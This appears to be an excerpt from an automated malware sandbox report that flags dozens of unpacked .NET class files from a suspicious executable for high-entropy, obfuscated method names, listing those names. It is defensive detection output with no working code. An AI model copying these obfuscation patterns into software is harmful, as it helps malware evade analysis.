            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, HfN3vpFrv9v3qSTGyY5.csHigh entropy of concatenated method names: 'k9YGu2hpH0', 'TuaGd8WH6G', 'vHuGrHvkx4', 'SkeG4bFXiB', 't9lGGtNDTs', 'RBSGmrYph1', 'O0XGeB84yJ', 'a1AGpInfac', 'y7LGPPoS7B', 'qGlGBxGsr3'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, Yxrd20KU6xmQpkDrx2p.csHigh entropy of concatenated method names: 'NLwYrLnvh6', 'o71Y4DTIvG', 'XENgnUJkue9r0CiiDq3', 'udBkuIJyCeaOg1Wn9UF', 's1Q444JxXQBQXZvPb1P', 'vI5k7hJtJGljGfFJyJD', 'EoJ3dEJFUQ2MsUpA5Ie', 'NHSSFtJXJYSZkeqcnqL', 'RHHU82JahZPHwhwrADv', 'AdPb2aJMmiKrXJLUGIm'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, i3OC7eYb4mpBnKWBTDX.csHigh entropy of concatenated method names: 'PEy0kW33lOWEI', 'RrIgW6oJne5pJ96Sb8P', 'tobdHgodO9W75qgIIXy', 'oNQAuBoT7K4uIpehDZk', 'DaL9XgoKPbnJ7yYtcU6', 'yrDKjFoUPNW8yh5YNJp', 'PWHi7GoLLWnj9Vgs25a', 'AltCOQoE2V2GRdGKuBg', 'qFg1SBoiPvNEpDuS5RL', 'H0gp7DoBxgEVKSp9cAy'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, s1EYFDeQJbKLSKirhfF.csHigh entropy of concatenated method names: 'f5cRTTS6pA', 'DFaRbMTTmr', 'z2rR1t0PsR', 'JEvRfjp9Ut', 'jc8ryZVQ3A5s2inuc3U', 'sqF4jWVrRXb0wnP4aq3', 'mLDh0BVNoGfqbk2dnTQ', 'YgQ4ooVePDJOgSyjOA7', 'KhheDAVRwO8o0HMbPup', 'XgsCfnVq6IA6v0G5myK'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, fdMTcS4bO4rG4nQwAFq.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'Rr1wwGgiJPmdlXqjl60', 'icDZSogB8oUcJpZyVg8', 'j5KjmSgVv7ekafd6uqR', 'dg0DoAgclmUNbfvLN8k', 'n8dQIGgxgPVZ2iXg7JA', 'TEPeelgt5iuefZg62BZ'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, yii6wheMCmQtv2Cbvif.csHigh entropy of concatenated method names: 'CoBRMIWbAJ', 'zcjRSym94F', 'u1QRHDD3gC', 'xSIXxOVo6L6QLNJqPe7', 'fs0HXbVuYfXBD6V8hps', 'NoOtNaVlyUtV4Bkbgca', 'BuTk15V04Pm1bh55ABl', 'Am2aSZVms1AvmxahJ41', 'WTyYQFVIPxaIr0T5U1O', 'tckvQFVPVVJXvGZ2m83'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, JjX99yeNVmTigQHdTrJ.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'ClnP0LjkAY', 'H29wYX2QCw', 'AENPxebLXX', 'W2sTkutLYOBTg0eNcLO', 'O8l9N8tEJPOs12E01Nm', 'T8y98qtJDBrx4F0f6fO', 'mrtEJotdYRsyRTr4Jms', 'DBOonetTbbUaiLYoLiW'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, Mpuv1DmdWqkU1hrkXKl.csHigh entropy of concatenated method names: 'xvOuYedhwr', 'A7luqyJFZU', 'is7utBCG9v', 'Ecsu2kLu0u', 'P63uRO2gk1', 'gFVu3tc3Go', 'RqMuwbw0lk', 'UMeu8fC0bU', 'EbWuvvnBuC', 'fptun3UvcO'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kKpvtnFkX0ASVKQOpjT.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'gvlr0Lgk4N', '_3il', 'WSfrZnXd7N', 'kZirO9C6pL', '_78N', 'z3K'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, U2SAQHFOXCYffxXfsPr.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, nRPgru493Tehsrh6OFt.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'tiDDhOO08CV3edRtNNS', 'jZnXPxOmXpRLXPs0Yul', 'q1a6RLOIQ0YtPRJ8hgV', 'BBIeEiOPBNjmYNGf6iW', 'mW2CZFO7xnYgFCm576R', 'imnWiSOAtQKD0oYHLmV'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, x0plSfK2e86vUFj9dns.csHigh entropy of concatenated method names: 'VaxYaaMRDI', 'McOYWsUCt1', 'oC1YzDp0j0', 'v4Kq0wv0em', 'epcqZ5qEhW', 'Gh5qOtnrc3', 'KSuqiMDwXf', 'fPJqYRUR1K', 'JTDqqRykwt', 'CwwmOIdA17wfWSahld3'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, wNQSaet41GSAlpVu6W.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'u5MAg6GYsVjs3GB3F0W', 'xNE6QPGgxv9UFQwZrmL', 'ixwLUYGZIKSXYoq49bX', 'jHiEHdG23tCEikZ9ILI', 'BQwV3XG4y8ouxHYLeFv', 'j99Bw2GO2qJOpqkvHdo'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, M4QXxA4E7JjMplBB9Aa.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'Q5GqIRZkPqg9eq1tSiT', 'qZkf6lZywgs6Hkgumb3', 'hGfq5xZFQQfoGlqo0Oi', 'FdpJZJZXnc5yCnyB4Mp', 'J1cyNyZaBvoEgaLVltk', 'XDva0VZM0RiqkXAnjXn'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, FMvgruj53AFPjNmKcF.csHigh entropy of concatenated method names: 'wGi9X4lqa', 'Fp4ukj7Xx', 'QCLLqg1Ko', 'v2jdMqlk8', 'UE1jP63hM', 'OAmVAJKIq', 'HmGx8QCk3', 'zOL3OkbZ6u4OFDrxcOU', 'VBL0Asb2Yy91DaMD8X8', 'DmjwfHb4U7IiPBZMO2y'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, KxYqtQyolIb7BvJOcy.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'F3JldDGJO2wSethgORg', 'jFnAmEGdqIWAP7rSHkA', 'JofQ7BGTOtE4EfYoneX', 'WXmDnpGK4VHn6Z2txkj', 'dKBP2eGUnlqWdqwxRde', 'xx9ackGixxyvBl2dNHl'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, MXnpDxmOu7SS5S3RJoY.csHigh entropy of concatenated method names: 'LTG9JO0Bs2', 'lba9ykY2jN', 'NrOdCNN7MhqCKfs0N2k', 'hivLGoNAsKXXGkZgsrX', 'l5kQd0N3T5logOTd6I6', 'TLNpNONS8ERXyutr1X5', 'q9T6cvNnSekfMgSiRRb', 'gKeJ6JNDkCvb5Cyx9Dw', 'qWOs3JNzFc0MsiknCNr', 'YeOQ1CqjObbwUSoKRpV'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, suEBtP48jbkK7qZIr4E.csHigh entropy of concatenated method names: 'siTZgJwgPy', 'Ik29pQ4kft5SJDfbwcu', 'paVVYP4yOvlssidemnY', 'Mk6LMC4xY9ftoY9LIxq', 'i4ja5C4tbbvi83gqolt', 'e0POlL4FkEmjyAVC4nN', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, YA9r7xaJmT30g7WIkWc.csHigh entropy of concatenated method names: 'leLxcj77fv', '_1kO', '_9v4', '_294', 'q8axs4su3E', 'euj', 'osFx98rVrp', 'WhWxusKEKY', 'o87', 'M7kxLxtPBL'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, iXn6oYFJGUi54Lp9RMW.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'dfG4GRS41U', 'HlR4m6QT1l', 'r8j', 'LS1', '_55S'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, dd6RCYmWbtXAGRP0hM4.csHigh entropy of concatenated method names: 'arE3xm5Gf0fRiSZeIgs', 'zCfs6W5YqufS2RSgaCL', 'GqAMyf516Q66rt35PSS', 'fIQKpw5sK14oV8otaiF', 'jDJPWr5gdUmqJQGswFH', 'nfx3vH5ZVGs02tCtEFB', 'oIYkiN52khLcXsNWXr8'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, ClpKQ8ezbxVoAo98Y1w.csHigh entropy of concatenated method names: 'xGbwjB1q2v', 'eqhwVkHE6X', 'f2FwxyExd6', 'SaaO2gk9tbVhaXLm484', 'ybsBChkp57fPglj9SAx', 'GPUpRAkC7xEZLI2B7hT', 'yLrNtOkWdpi9IVpeOKe', 'MNHPDZkfXYNcwuJjCVd', 'a4G5o0kHlgJFIcbBBu2', 'PkEghkkowkW3DMUtZGe'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, DDNHaJe9dXxr8HNM9G0.csHigh entropy of concatenated method names: '_269', '_5E7', 'YIZP3na0BG', 'Mz8', 'd2hP62rAZd', 'MM118etISFAgK2FiyZu', 'xCPMSStPke9eY8LcAUG', 'LFVrFCt7seNow7Bj2w1', 'Fr874ktAxqYw4UiU8v2', 'GoZhgat3eco6b7OZ70H'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kHmc3mKKffFdxPhK0OA.csHigh entropy of concatenated method names: 'qPmOUWwYTx', 'bfnOMKMIhs', 'qM6OSBbTZP', 'FqJOHsEOSm', 'oeUOEDjNUC', 'dU2OgygIQp', 'QiwLdO6KiSESPjBxQvZ', 'KRwPlT6Up5pG1XhJqM4', 'ExtXB86dNdooYB1Eroq', 'utnTJg6T5JS6EcUPOyY'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, v6Ba809KpxcyqFPSeT.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'SwwM9VGa0QvuUmPSwxl', 'gQVBl0GM42ByiF7u6mq', 'xBoFvfGwcEiIFbDWFuC', 'lAQspyGhOpk7NmM4T0Z', 'ait6q3GekBH5uQVTqap', 'NhcyIUGR2ZnknEdJMir'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, FrWgtOFmwKqCVWccJji.csHigh entropy of concatenated method names: 'bTxve50bF8', 'rjfk5PyU9mcUhVVDt80', 'bf210MyiLUmdyuNVJbM', 'DughDcyTiH7kVMMInIG', 'WHnO5ByKqABrHY8UxAK', 'W73wAs74oq', 'xI9wFCdORn', 'trjwQjcOJe', 'gU4whmDMIq', 'avywXiLcnq'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, tHGfSGePnSN5loNOcfS.csHigh entropy of concatenated method names: '_223', 'f5hUIfVKaFVYsTeAsy5', 'bFhPmcVUGGXQ2CGts2t', 'glKNZ6Virk5k4BQc6Kq', 'hbf2eCVBhete3Ne4iiv', 'srCtQUVVErd7vrPw2gs', 'VnJf8PVcXmKgSFvweJk', 'BgpLj5VxCMpWgqSaBxR', 'lh0rbOVtHJWvAoQNNNd', 'pLZY2JVkqaKs15fuC3T'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, o4uJpAHHMVmtTsn4jR.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'YPfd24vntYVyKdCqKGR', 'cHZMQtvDMb8LNM4odaU', 'J13QUFvzCFCcolLvUON', 'eLcX3L1jwuoDOvJ4wfG', 'GhgH7P1bSwM4E3tkris', 'SFiHBl1vwelI1ZnbNTE'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, xKNkDPekrtCKJiCidfE.csHigh entropy of concatenated method names: 'Y3t3QOVBTv', 'AAY3hQglKD', 'n4trmaxUhyYEDqAJHZZ', 'oBvWX9xiHRNZTybqWHO', 'zh9vcBxT6Urf8Jwfrfy', 'NCXYluxKGcaYsovy7qK', 'Knvh0axBD2kj1VvW5ur', 'j96ENWxVTo9D4x9twQJ'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, GmsxILm2VkZtsAgbVHl.csHigh entropy of concatenated method names: 'QCq9buRbgx', 'SHD912UGQZ', 'UCB9fVMo3R', 'fXJg89qrfSYKcDJW0uF', 'yp42LAqR6rJhfnDFwuZ', 'ew0QoqqQSFTal02nXl0', 'HaOpDVqNQ1o0Pd5wOZR', 'IfNuJFqqGvEGCeO5sXn'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.csHigh entropy of concatenated method names: 'vmwHVWoFHM6TPj938KT', 'ktl59eoXNVJtT6KLKgm', 'kDUhy1okbYdN1P8wYsj', 'V3VyGVoyon6vSCd2BK2', 'ibuF4NbAvW', 'nPAkOXowr0eNP9t0iRc', 'cu9QBkoh415EI8anAL2', 'U8HLgJoeq0fXV2acn8y', 'E4H8EVoRbc5PdJWAMnZ', 'wMDOQioQArWK6ojif59'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, ponBPGFSjYYWTaTNaWS.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, mZddw0KAmT4LH8aKS1a.csHigh entropy of concatenated method names: 'gYVtR7xg1e', 'wT1t3IGt1U', 'qqyFMmKA4WYjA7Ay2xD', 'K6BgaGK3IrJEpYhDExF', 'NtJWdAKPLGg5sMpy4Cl', 'HI6746K73ZUrvkpgbJ1', 'ep1tegT7KY', 'lKDMFwUjF0BRtmcFmGT', 'T3x8UYUbPo24usnl6yt', 'lMhLxwKDK6R7q6sPBYQ'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, aWINOhe54FTcqUiKgOr.csHigh entropy of concatenated method names: 'ODQRhSExcJ', 'kfXRXkmatR', 'CsnRIUYHi8', 'tUxgAoVEfuWCotqRMc5', 'UM87SdV6Bg6sBC61w9V', 'nW9ZXgVLMKBF6ohthYd', 'W9V7xEVJabnkQEW3RoE', 'cwdRG7XCqP', 'P4nRmtE3Ot', 'j3ERe3pUit'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, hI5jAWmnjbvfOa9N6kn.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, QlN77246qOpP8FMnMac.csHigh entropy of concatenated method names: 'TAaOZPkj8O', 'iFIOOJJsoa', 'ATDOinXNYB', 'kCDPdQ4IBYT9kbpADQM', 'DaY2HG4PFYES6YQaKvU', 'GbXiZ640Xhcw1r8txc6', 'tPswH14mlx1Ekk7I2Hv', 'RyxZ7847Sh6cNQVf2Kf', 'PUEKOi4A8CASMDvA0HH', 'iuYHGC43EAUYe0v897U'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, SudaoE4QHy79dqhO31N.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'HDAgdXgCfOS36eWQKZ3', 'OqbEPHgWS3t1sqZ0Q7v', 'DxyG6ng9xPkRTXNfZyE', 'aYPnSQgp2RWnDSqkptQ', 'C5fvBTgfVJqkxorDytr', 'hxuriPgH9PpFcbIt1hh'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, d2NBai4MieLWa7xw9m5.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'TYePbCgPYgodH3hf0yD', 'orjYWQg7YGLcDrS7OF1', 'Pbtfj0gAxOktwNOpa2X', 'hH2Wqog3pKIiySx6Hh0', 'fCFVKMgStJKj1pAEXtP', 'imlPglgn1PbDJlMbsf9'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, lcIwC8F9WCpv3FBmSoI.csHigh entropy of concatenated method names: 'RdA4aYVVbI', 'GJ64XNCeMb', 'wTu4IPR50L', 'kTB47GklW3', 'YZV46ixQ8N', 'b5Y4lFPPv8', 'bf14KD5Wjf', 'Vge4DJcqit', 'wvV45kVl7R', 'JlB4TE7hwb'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, unZDRe42ks2m0tvvwX0.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'dUi8Z82NkikyRg4TjPp', 'XhfaAQ2q8EjbuglfQoS', 'odwxep25kXwuZke1HQt', 'svV2Bk2CuRmSSuCHKaU', 'gP3DeR2W2veKPuIw29w', 'B84GCD29FMPn6rwBrnV'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, ndyniN4VfMtAii4D02w.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qtCP1pZuIXCgdtDFsYm', 'HMDCMxZlmnyTdUitYov', 'HAG794Z0srKoJXlLA1w', 'lTZCgaZmDBYDVFVwttD', 'piA9YRZIi1AvZS0yJID', 'qDd0UKZPgrKfg6NsIYY'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kD6e0xFPA3o2UgPstAZ.csHigh entropy of concatenated method names: 'aj0vI5b7h1', 'jxLv7Rwssw', 'vyFv6kZB8s', 'H6Cvlyr3pC', 'VOOvKb0fBF', 'ziSbE0yDNEhOsLecqWk', 'Llbos7yzDaCFQhqU21x', 'P5yONAySeMR89yaGXUR', 'o1hdg9ynNTJel65VXWM', 'K84TUEFjGi3UbtVwbAu'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CrlIH9a2N3DHPHhuPO0.csHigh entropy of concatenated method names: 'M22d3EFiUG', 'SoZdwvgfc5', 'MWDd8hYqPL', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'bsKdvMCmW3'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, xb42WteyXrnrraCwkE1.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'xFow8S7M3W', 'OaZPsec4TG', 'fOrwvysVwS', 'RXdPjZwhfo', 'g5T3yft5wbQASNj9Q8F', 'LR8ELUtCaLsEVDJKklg', 'SCbEWhtNZnXaEF89dpw'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jxaQrL41pBvfTk3iEdY.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'hATghPZDZnBNZegbugR', 'Xti9RjZzsMKvE5F9Txf', 'Gfxi6C2jQeNRwr5TPo8', 'gRrKYk2bDevTl2fo5Zx', 'GIyBer2vA4NInFSIoSA', 'a0LZS6218o8XsgkIxxy'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, b1dvrGah8pK4vSdRZht.csHigh entropy of concatenated method names: 'wOLV6eC8QE', 'i1nb8cfwibtcxRLC7W3', 'IaRCn5fhvXKhPvaEyI4', 'UotjcXfaW1f1Dvi3PqT', 'JDPWgpfMVNKobDwLN1G', '_1fi', 'oh7jHopwwN', '_676', 'IG9', 'mdP'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CKhbfiFBiMbG67oB7cq.csHigh entropy of concatenated method names: '_7zt', 'CWPnBc7KxL', 'Pp6nJAZvYN', 'MmqnykTbSJ', 'CsZno1FRyC', 'b7VncJ3iZF', 'M8XnsidnAS', 'pnni5FFxbTMmA2kjHEh', 'FlRCrmFtcKjCqUp9J4I', 'gGOovFFVgLoqlnnbBSx'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, QBjTIyF1y4jdnYQW0qM.csHigh entropy of concatenated method names: 'sFLrh12dFv', 'mMarX4xE7L', 'WlbrIlrg5d', 'R0Zr78W6O2', 'Pcer61MgWY', 'wGpJFCXiuAGy2xvoHYl', 'lax0moXKjJ4SStrYxfs', 'h3Z32xXUBkuQdfIXYJo', 'u0ya2OXB8ENXrh6Cb3L', 'TGhNvEXVV0uXG64qNcy'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, WPLdmfFfPr1ZYpLQePI.csHigh entropy of concatenated method names: 'iPJnYpljkf', 'Jjtnq19Fsc', 'Bn0ntN2GJU', 'aD8pIHFTQ3lXImJATBG', 'Mmpr9wFKJa4tgcq4q3n', 'QcRkKOFJU9BKBt8pvXb', 'aG39QGFdvCZMdAmB2iH', 'qPcrknFUBoHLyE9HSki', 'bILMTDFiDJGfTwR3h5H', 'VqswLfFBdfpSswCBnoG'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, J7WXVolgNFHWLfd4oV.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'KrI9uNvOIX65Fi7AxtZ', 'sq47Urv8p4g6C0rqZMg', 'odc1Cuv6hy5W4Z0xnJG', 'emY71RvL0gs8rNPZ6kp', 'aDbeFbvEdpvRqfxjgkO', 'EXBEsgvJ7LYCkVS7E6x'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, IPrpOg4ivGQuX1KZ1Z2.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'FaJoWsZrBS7ARdxGDYA', 'AAsGHIZNlMQVD5Vx8T4', 'ddnlQmZqkYtIBeGxnKg', 's6liWFZ580aSR7Lx3Uw', 'Q1Cq5dZCVYUjC60oqO2', 'VLgMw0ZWm7S6Ao9mhMi'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, TqIR1IaX6SfDv216AUp.csHigh entropy of concatenated method names: 'i6Tu1UL38O', 'FLyufQWIk8', 'MGpuUjypCJ', 'mhPuMIDE3G', 'd29uSAHC4b', 'oqCuHCwspP', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, X7jS2K4PlAcm9XfQG6l.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'XTLk7ogXuSOmPT1dJ7R', 'kur37rgarVt9QPc359Q', 'kgFYaqgMfNn8nMQ3C6A', 'RMXVwIgw4XeL8sZEwA2', 'triOJighi7lIxZy7rVZ', 'EcciOogessLqyVeFBy7'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, irJ7RlqH7Acvs0WRwM.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'SiYKTTt9B', 'efUlOHviYSmB2bToXfS', 'OUhGUFvBQ6y0mL1W82X', 'b85TwCvVP6ZoR39r6Ox', 'pKjwh0vc0xfyOsjE0cx', 'aWqtUdvxJIO0t3fgS2t'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, U8QthdKx7SyKMWsocs4.csHigh entropy of concatenated method names: 'V4k2ulTmA1', 'uY2MN7UmbZtfCl4xcN5', 'W5QK1RUlmNBqLesIfLa', 'S6eRgGU0VOWBTPZjKTT', 'tCKrN9UIqEafQOt0xg0', 's8RTQNUPCjppcxbcorV', 'dl82PjYpf1', 'Agv2BLOKGg', 'mrE2JyFbAE', 'FxY2yZDTpd'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, YI0q4D4mlIjFiBtYt7M.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'wFhM0yYoAxdXVDvEYhB', 'guyrHoYuVEhyYiFONkp', 'FkPXrYYlB8MT1xdlb4u', 'AUEAqwY0F68UJSAx0WR', 'Quwm0wYmBOxP8OK98bn', 'MP8viLYIXyG136F6Kpu'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, vkm65le0nr3OklfgTBH.csHigh entropy of concatenated method names: '_5u9', 'mLGPHkr9fB', 'oLXw036Vn0', 'PFiPos5P3Y', 'ghtfZTxS5NT0PkOCbIa', 'P74RB9xnLcT7wFOM3sI', 'hmoQ16xDBs5a7jYLXg0', 'Kg4HJ7xAKfuHkAnxHdw', 'oOrDaKx3uHgF1FfPc2h', 'uPvDh9xz0CoNrKFIaAp'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, Gefqe7aahIUZokdMeEe.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, SarJmF4ecfafqvWFsrF.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'lxKdiVYw3qChcfONLL0', 'YaOMLPYh4BVRdRWvx6a', 'QkPMiBYe3y2Ka0PYrgS', 'hYaolvYRwJYPA0Ddhok', 'KGl5cEYQO89cvSwGm1m', 'Hhk8WGYrb4R6jDMg8o2'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, roMYe0KBxe0WVFOZWH5.csHigh entropy of concatenated method names: 'HZWiz2s1Pf', 'zmRY0mwt3S', 'dR6YZicehL', 'w1TYO27Ado', 'CaWYirSeHX', 'z1TYYw7q5D', 'JPDYqsuIei', 'nqVYtLxwNB', 'A5hY22bY5O', 'Hu1YReSJqM'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, kW4WyY44EXMCcipRbdE.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'Wd3TgTYinyY6tL3qAdW', 'xHKfh5YBUbhVfZwutyL', 'Hw9QF8YVB7kHvWPdm0C', 'e5AnweYcCy4msaq6mOs', 'f9yp6IYxWVqm3STa6iN', 'gFWmIyYtf92DhtXUibS'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, tkBFEPFbrhKpgSJM7qo.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, zoH7lyF70Lu6988N8R7.csHigh entropy of concatenated method names: 'oswnhWJZ88', 'YCNnXnxQds', 'bInnIVJeOw', 'EwPn7cO0W2', 'kRvn63PPjj', 'y6ErbvFrKBgY0KH4SLe', 'F4RGwGFNNQ6FubucDMa', 'sAcvmIFRbro8jBaC2C8', 'wfQVHKFQ5To8jkvEcSb', 'obLtutFqPuMBDOorwtr'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, bE1htpmTHSaciN1BQo0.csHigh entropy of concatenated method names: 'VPP9EgVgMc', 'XPr9gToxk4', 'bjl9CRtOZZ', 'VXE9N6uoqa', 'w4m9kOma71', 'g1n9akTyN1', 'narTRBqlG7dq5DcCa6j', 'OVC6sgqosDcI0UGlTDP', 'JKjXyEquyJMQks1tnE1', 'XbW4Irq0I8xbFbotDDT'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, F1ZVGhet8mVhUs9nOxI.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'pf0PisF68A', '_168', 'kklQJutyg963uWs46nQ', 'FHoxmBtFp9JJFTxivUb', 'EFBG81tXVkEBESALcEt', 'E0b0hntajW6uFaUuMcj', 'cn7fg8tMHJN7ZusLoit'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, lrywdWK38UkhXCrPEOE.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'IfFqXed6EB', 'z14qIkxFdA', 'wicq7ebBYT', 'Y3Jq6FIT1c', 'yy3qlSMAj7', 'jU3U2sK2LyKciHBAlj5', 'z1sH4PK4kCv7hWMRBv7', 'xd1vhWKgmE2y6uAPAcn'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, CYMUY0KjkCkuAgTiD0K.csHigh entropy of concatenated method names: 'MqOYyNwe65', 'a4WYo4nVyT', 'OSeYcsHgO8', 'n4tYs9sKyM', 'iWYY94Fq7i', 'ddEyjJdjVOQjV4nBvmg', 'CuLPC3db4fq19r6aQfr', 'f4uieKJDyYYSk3IhQiI', 'OnGpK7JzWnvod3rj0FJ', 'sHoMF9dvhMaOOrmjrAC'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, T31VDE4xpUBw9hpGOmX.csHigh entropy of concatenated method names: 'ciAOcPbj3y', 'F3fOsbERsn', 'WcZO97qEEp', 'nS3KAi8OS0YDU6aZPIL', 'nZXf4C82Jt2jZB2NQjP', 'Srx88N84G9qubwKtZjZ', 'AubLYV88w4YGGgq67GY', 'igbObW86vkrWaUooUCZ', 'r9WPQ48LWrjpluvhwsF', 'GAA5n88EWktkTA1ah1B'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, FRfxV14r0lxFXZrXS5T.csHigh entropy of concatenated method names: 'z5COBb4Kn1', 'QVSXC18YWUwHZ0nwISZ', 'ec1BMP8gO5NEQh7SA7k', 'kDcpj48s7bxLAoctgQj', 'SWjTlm8GJRS1S5j7IHQ', 'E8Cu4n8ZQLuLbcPw8DW', '_5q7', 'YZ8', '_6kf', 'G9C'
